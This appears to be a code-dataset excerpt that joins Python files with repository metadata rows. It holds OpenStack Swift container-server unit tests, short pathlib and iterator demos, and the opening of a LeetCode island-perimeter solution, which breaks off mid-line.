req = Request.blank(
'/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.body, plain_body,
'Invalid body for Accept: %s' % accept)
self.assertEquals(
resp.content_type, 'text/plain',
'Invalid content_type for Accept: %s' % accept)
req = Request.blank(
'/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.content_type, 'text/plain',
'Invalid content_type for Accept: %s' % accept)
# test conflicting formats
req = Request.blank(
'/sda1/p/a/plainc?format=plain',
environ={'REQUEST_METHOD': 'GET'})
req.accept = 'application/json'
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.body, plain_body)
# test unknown format uses default plain
req = Request.blank(
'/sda1/p/a/plainc?format=somethingelse',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.body, plain_body)
def test_GET_json_last_modified(self):
# make a container
req = Request.blank(
'/sda1/p/a/jsonc', environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i, d in [(0, 1.5), (1, 1.0), ]:
req = Request.blank(
'/sda1/p/a/jsonc/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': d,
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test format
# last_modified format must be uniform, even when there are not msecs
json_body = [{"name": "0",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.500000"},
{"name": "1",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"}, ]
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(simplejson.loads(resp.body), json_body)
self.assertEquals(resp.charset, 'utf-8')
def test_GET_xml(self):
# make a container
req = Request.blank(
'/sda1/p/a/xmlc', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/xmlc/%s' % i,
environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
xml_body = '<?xml version="1.0" encoding="UTF-8"?>\n' \
'<container name="xmlc">' \
'<object><name>0</name><hash>x</hash><bytes>0</bytes>' \
'<content_type>text/plain</content_type>' \
'<last_modified>1970-01-01T00:00:01.000000' \
'</last_modified></object>' \
'<object><name>1</name><hash>x</hash><bytes>0</bytes>' \
'<content_type>text/plain</content_type>' \
'<last_modified>1970-01-01T00:00:01.000000' \
'</last_modified></object>' \
'<object><name>2</name><hash>x</hash><bytes>0</bytes>' \
'<content_type>text/plain</content_type>' \
'<last_modified>1970-01-01T00:00:01.000000' \
'</last_modified></object>' \
'</container>'
# tests
req = Request.blank(
'/sda1/p/a/xmlc?format=xml',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
self.assertEquals(resp.body, xml_body)
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/xmlc?format=xml',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
for xml_accept in (
'application/xml', 'application/xml;q=1.0,*/*;q=0.9',
'*/*;q=0.9,application/xml;q=1.0', 'application/xml,text/xml'):
req = Request.blank(
'/sda1/p/a/xmlc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = xml_accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.body, xml_body,
'Invalid body for Accept: %s' % xml_accept)
self.assertEquals(
resp.content_type, 'application/xml',
'Invalid content_type for Accept: %s' % xml_accept)
req = Request.blank(
'/sda1/p/a/xmlc',
environ={'REQUEST_METHOD': 'HEAD'})
req.accept = xml_accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.content_type, 'application/xml',
'Invalid content_type for Accept: %s' % xml_accept)
req = Request.blank(
'/sda1/p/a/xmlc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = 'text/xml'
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/xml')
self.assertEquals(resp.body, xml_body)
def test_GET_marker(self):
# make a container
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/c/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x', 'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test limit with marker
req = Request.blank('/sda1/p/a/c?limit=2&marker=1',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
result = resp.body.split()
self.assertEquals(result, ['2', ])
def test_weird_content_types(self):
snowman = u'\u2603'
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i, ctype in enumerate((snowman.encode('utf-8'),
'text/plain; charset="utf-8"')):
req = Request.blank(
'/sda1/p/a/c/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1', 'HTTP_X_CONTENT_TYPE': ctype,
'HTTP_X_ETAG': 'x', 'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
result = [x['content_type'] for x in simplejson.loads(resp.body)]
self.assertEquals(result, [u'\u2603', 'text/plain;charset="utf-8"'])
def test_GET_accept_not_valid(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c1', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Put-Timestamp': '1',
'X-Delete-Timestamp': '0',
'X-Object-Count': '0',
'X-Bytes-Used': '0',
'X-Timestamp': normalize_timestamp(0)})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
req.accept = 'application/xml*'
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 406)
def test_GET_limit(self):
# make a container
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test limit
req = Request.blank(
'/sda1/p/a/c?limit=2', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
result = resp.body.split()
self.assertEquals(result, ['0', '1'])
def test_GET_prefix(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('a1', 'b1', 'a2', 'b2', 'a3', 'b3'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?prefix=a', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.body.split(), ['a1', 'a2', 'a3'])
def test_GET_delimiter_too_long(self):
req = Request.blank('/sda1/p/a/c?delimiter=xx',
environ={'REQUEST_METHOD': 'GET',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 412)
def test_GET_delimiter(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('US-TX-A', 'US-TX-B', 'US-OK-A', 'US-OK-B', 'US-UT-A'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?prefix=US-&delimiter=-&format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(
simplejson.loads(resp.body),
[{"subdir": "US-OK-"},
{"subdir": "US-TX-"},
{"subdir": "US-UT-"}])
def test_GET_delimiter_xml(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('US-TX-A', 'US-TX-B', 'US-OK-A', 'US-OK-B', 'US-UT-A'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?prefix=US-&delimiter=-&format=xml',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(
resp.body, '<?xml version="1.0" encoding="UTF-8"?>'
'\n<container name="c"><subdir name="US-OK-">'
'<name>US-OK-</name></subdir>'
'<subdir name="US-TX-"><name>US-TX-</name></subdir>'
'<subdir name="US-UT-"><name>US-UT-</name></subdir></container>')
def test_GET_delimiter_xml_with_quotes(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
req = Request.blank(
'/sda1/p/a/c/<\'sub\' "dir">/object',
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?delimiter=/&format=xml',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
dom = minidom.parseString(resp.body)
self.assert_(len(dom.getElementsByTagName('container')) == 1)
container = dom.getElementsByTagName('container')[0]
self.assert_(len(container.getElementsByTagName('subdir')) == 1)
subdir = container.getElementsByTagName('subdir')[0]
self.assertEquals(unicode(subdir.attributes['name'].value),
u'<\'sub\' "dir">/')
self.assert_(len(subdir.getElementsByTagName('name')) == 1)
name = subdir.getElementsByTagName('name')[0]
self.assertEquals(unicode(name.childNodes[0].data),
u'<\'sub\' "dir">/')
def test_GET_path(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('US/TX', 'US/TX/B', 'US/OK', 'US/OK/B', 'US/UT/A'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?path=US&format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(
simplejson.loads(resp.body),
[{"name": "US/OK", "hash": "x", "bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"},
{"name": "US/TX", "hash": "x", "bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"}])
def test_GET_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'GET',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_through_call(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '404 ')
def test_through_call_invalid_path(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/bob',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '400 ')
def test_through_call_invalid_path_utf8(self):
inbuf = StringIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '\x00',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '412 ')
def test_invalid_method_doesnt_exist(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': 'method_doesnt_exist',
'PATH_INFO': '/sda1/p/a/c'},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '405 ')
def test_invalid_method_is_not_public(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.controller.__call__({'REQUEST_METHOD': '__init__',
'PATH_INFO': '/sda1/p/a/c'},
start_response)
self.assertEquals(errbuf.getvalue(), '')
self.assertEquals(outbuf.getvalue()[:4], '405 ')
def test_params_format(self):
req = Request.blank(
'/sda1/p/a/c',
headers={'X-Timestamp': normalize_timestamp(1)},
environ={'REQUEST_METHOD': 'PUT'})
req.get_response(self.controller)
for format in ('xml', 'json'):
req = Request.blank('/sda1/p/a/c?format=%s' % format,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 200)
def test_params_utf8(self):
# Bad UTF8 sequence, all parameters should cause 400 error
for param in ('delimiter', 'limit', 'marker', 'path', 'prefix',
'end_marker', 'format'):
req = Request.blank('/sda1/p/a/c?%s=\xce' % param,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400,
"%d on param %s" % (resp.status_int, param))
# Good UTF8 sequence for delimiter, too long (1 byte delimiters only)
req = Request.blank('/sda1/p/a/c?delimiter=\xce\xa9',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 412,
"%d on param delimiter" % (resp.status_int))
req = Request.blank('/sda1/p/a/c',
headers={'X-Timestamp': normalize_timestamp(1)},
environ={'REQUEST_METHOD': 'PUT'})
req.get_response(self.controller)
# Good UTF8 sequence, ignored for limit, doesn't affect other queries
for param in ('limit', 'marker', 'path', 'prefix', 'end_marker',
'format'):
req = Request.blank('/sda1/p/a/c?%s=\xce\xa9' % param,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204,
"%d on param %s" % (resp.status_int, param))
def test_put_auto_create(self):
headers = {'x-timestamp': normalize_timestamp(1),
'x-size': '0',
'x-content-type': 'text/plain',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e'}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/.a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/.c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/.o',
environ={'REQUEST_METHOD': 'PUT'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_delete_auto_create(self):
headers = {'x-timestamp': normalize_timestamp(1)}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/.a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/.c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
req = Request.blank('/sda1/p/a/.c/.o',
environ={'REQUEST_METHOD': 'DELETE'},
headers=dict(headers))
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_content_type_on_HEAD(self):
Request.blank('/sda1/p/a/o',
headers={'X-Timestamp': normalize_timestamp(1)},
environ={'REQUEST_METHOD': 'PUT'}).get_response(
self.controller)
env = {'REQUEST_METHOD': 'HEAD'}
req = Request.blank('/sda1/p/a/o?format=xml', environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank('/sda1/p/a/o?format=json', environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank('/sda1/p/a/o', environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/o', headers={'Accept': 'application/json'}, environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/o', headers={'Accept': 'application/xml'}, environ=env)
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
self.assertEquals(resp.charset, 'utf-8')
    def test_updating_multiple_container_servers(self):
        # A container PUT whose X-Account-Host header lists two account
        # servers must fan the account update out to both of them.
        http_connect_args = []
        def fake_http_connect(ipaddr, port, device, partition, method, path,
                              headers=None, query_string=None, ssl=False):
            # Stand-in connection that always reports HTTP 200.
            # NOTE(review): SuccessfulFakeConn is defined but never returned
            # from fake_http_connect -- confirm whether the caller only needs
            # the call to succeed, not a connection object.
            class SuccessfulFakeConn(object):
                @property
                def status(self):
                    return 200
                def getresponse(self):
                    return self
                def read(self):
                    return ''
            # Record each connection attempt so the assertions below can
            # inspect exactly what was sent to each account server.
            captured_args = {'ipaddr': ipaddr, 'port': port,
                             'device': device, 'partition': partition,
                             'method': method, 'path': path, 'ssl': ssl,
                             'headers': headers, 'query_string': query_string}
            http_connect_args.append(
                dict((k, v) for k, v in captured_args.iteritems()
                     if v is not None))
        req = Request.blank(
            '/sda1/p/a/c',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'X-Account-Partition': '30',
                     'X-Account-Host': '1.2.3.4:5, 6.7.8.9:10',
                     'X-Account-Device': 'sdb1, sdf1'})
        # Swap in the fake connector; restore the real one even on failure.
        orig_http_connect = container_server.http_connect
        try:
            container_server.http_connect = fake_http_connect
            req.get_response(self.controller)
        finally:
            container_server.http_connect = orig_http_connect
        # Sort by IP so the per-server assertions are deterministic.
        http_connect_args.sort(key=operator.itemgetter('ipaddr'))
        self.assertEquals(len(http_connect_args), 2)
        self.assertEquals(
            http_connect_args[0],
            {'ipaddr': '1.2.3.4',
             'port': '5',
             'path': '/a/c',
             'device': 'sdb1',
             'partition': '30',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-bytes-used': 0,
                 'x-delete-timestamp': '0',
                 'x-object-count': 0,
                 'x-put-timestamp': '0000012345.00000',
                 'referer': 'PUT http://localhost/sda1/p/a/c',
                 'user-agent': 'container-server %d' % os.getpid(),
                 'x-trans-id': '-'})})
        self.assertEquals(
            http_connect_args[1],
            {'ipaddr': '6.7.8.9',
             'port': '10',
             'path': '/a/c',
             'device': 'sdf1',
             'partition': '30',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-bytes-used': 0,
                 'x-delete-timestamp': '0',
                 'x-object-count': 0,
                 'x-put-timestamp': '0000012345.00000',
                 'referer': 'PUT http://localhost/sda1/p/a/c',
                 'user-agent': 'container-server %d' % os.getpid(),
                 'x-trans-id': '-'})})
def test_serv_reserv(self):
# Test replication_server flag was set from configuration file.
container_controller = container_server.ContainerController
conf = {'devices': self.testdir, 'mount_check': 'false'}
self.assertEquals(container_controller(conf).replication_server, None)
for val in [True, '1', 'True', 'true']:
conf['replication_server'] = val
self.assertTrue(container_controller(conf).replication_server)
for val in [False, 0, '0', 'False', 'false', 'test_string']:
conf['replication_server'] = val
self.assertFalse(container_controller(conf).replication_server)
def test_list_allowed_methods(self):
# Test list of allowed_methods
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST']
repl_methods = ['REPLICATE']
for method_name in obj_methods:
method = getattr(self.controller, method_name)
self.assertFalse(hasattr(method, 'replication'))
for method_name in repl_methods:
method = getattr(self.controller, method_name)
self.assertEquals(method.replication, True)
    def test_correct_allowed_method(self):
        # Test correct work for allowed method using
        # swift.container.server.ContainerController.__call__
        inbuf = StringIO()
        errbuf = StringIO()
        outbuf = StringIO()
        # Controller configured to refuse replication-only methods.
        self.controller = container_server.ContainerController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false'})
        def start_response(*args):
            """Sends args to outbuf"""
            outbuf.writelines(args)
        method = 'PUT'
        # Minimal WSGI environ for a PUT to a container path.
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        method_res = mock.MagicMock()
        # Replace PUT with a public mock; __call__ should dispatch to it
        # and return its result unchanged.
        mock_method = public(lambda x: mock.MagicMock(return_value=method_res))
        with mock.patch.object(self.controller, method, new=mock_method):
            response = self.controller.__call__(env, start_response)
            self.assertEqual(response, method_res)
    def test_not_allowed_method(self):
        # Test correct work for NOT allowed method using
        # swift.container.server.ContainerController.__call__
        inbuf = StringIO()
        errbuf = StringIO()
        outbuf = StringIO()
        # Controller configured with replication_server disabled, so any
        # replication-marked method must be rejected by __call__.
        self.controller = container_server.ContainerController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false'})
        def start_response(*args):
            """Sends args to outbuf"""
            outbuf.writelines(args)
        method = 'PUT'
        # Minimal WSGI environ for a PUT to a container path.
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        # Expected body of the 405 Method Not Allowed response.
        answer = ['<html><h1>Method Not Allowed</h1><p>The method is not '
                  'allowed for this resource.</p></html>']
        # Mark the mocked PUT as replication-only; dispatch must refuse it.
        mock_method = replication(public(lambda x: mock.MagicMock()))
        with mock.patch.object(self.controller, method, new=mock_method):
            response = self.controller.__call__(env, start_response)
            self.assertEqual(response, answer)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| [
"marvin@PC.(none)"
] | marvin@PC.(none) |
ec358af8dcc747a31d12f7fb499c7a78bba2c640 | 7701773efa258510951bc7d45325b4cca26b3a7d | /from_trans_file_cloud/explore_pathlib.py | cd6ac1e600ecf9cc21bb0408817543f804917d9b | [] | no_license | Archanciel/explore | c170b2c8b5eed0c1220d5e7c2ac326228f6b2485 | 0576369ded0e54ce7ff9596ec4df076e69067e0c | refs/heads/master | 2022-06-17T19:15:03.647074 | 2022-06-01T20:07:04 | 2022-06-01T20:07:04 | 105,314,051 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from pathlib import Path
# Demonstrate pathlib's Path.parents: check whether `root` is one of the
# ancestor directories of `child`.
root = Path('D:\\Development\\Python\\trans_file_cloud\\.git')
child = Path('D:\\Development\\Python\\trans_file_cloud\\.git\\hooks')
other = Path('/some/other/path')  # unused here; kept for experimentation
# Prints True: .git is the direct parent of .git\hooks.
print(root in child.parents)
"jp.schnyder@gmail.com"
] | jp.schnyder@gmail.com |
ae83c59eb63599eac7d7f45ea8229a239af25040 | 82f993631da2871933edf83f7648deb6c59fd7e4 | /w1/L3/7.py | 8469a86b108877706bb07df0088f4d1eea2b7434 | [] | no_license | bobur554396/PPII2021Summer | 298f26ea0e74c199af7b57a5d40f65e20049ecdd | 7ef38fb4ad4f606940d2ba3daaa47cbd9ca8bcd2 | refs/heads/master | 2023-06-26T05:42:08.523345 | 2021-07-24T12:40:05 | 2021-07-24T12:40:05 | 380,511,125 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | # - [] Iterators and Iterbales
a = [1, 2, 3, 4] # - iterable object
it = iter(a)
# print(next(it))
# print(next(it))
# print(next(it))
# print(next(it))
# print(next(it))
for i in it:
print(i)
| [
"bobur.muhsimbaev@gmail.com"
] | bobur.muhsimbaev@gmail.com |
f9a25ea75f1038ebb53730647439228ea1d83873 | 9102c3a5fa3a5b0202d61206973d0ea167f7a4d0 | /July/07-IslandPerimeter.py | a93da08ce948ac402b6597b23157a28ceea1580f | [] | no_license | Madhav-Somanath/LeetCode | 8e1b39e106cec238e5a2a3acb3eb267f5c36f781 | b6950f74d61db784095c71df5115ba10be936c65 | refs/heads/master | 2023-01-08T15:10:00.249806 | 2020-10-31T14:45:43 | 2020-10-31T14:45:43 | 255,654,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,657 | py | """ You are given a map in form of a two-dimensional integer grid where 1 represents land and 0 represents water.
Grid cells are connected horizontally/vertically (not diagonally). The grid is completely surrounded by water,
and there is exactly one island (i.e., one or more connected land cells).
The island doesn't have "lakes" (water inside that isn't connected to the water around the island). One cell is a square with side length 1.
The grid is rectangular, width and height don't exceed 100. Determine the perimeter of the island. """
# SOLUTION
class Solution:
    def islandPerimeter(self, grid: List[List[int]]) -> int:
        """Return the perimeter of the single island in the 0/1 grid.

        Each land cell contributes one unit of perimeter for every side
        that touches water or the edge of the grid.
        """
        if not grid:
            return 0

        rows, cols = len(grid), len(grid[0])

        def exposed_sides(r, c):
            # Count the sides of cell (r, c) facing water or the border.
            total = 0
            for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
                if nr < 0 or nc < 0 or nr == rows or nc == cols \
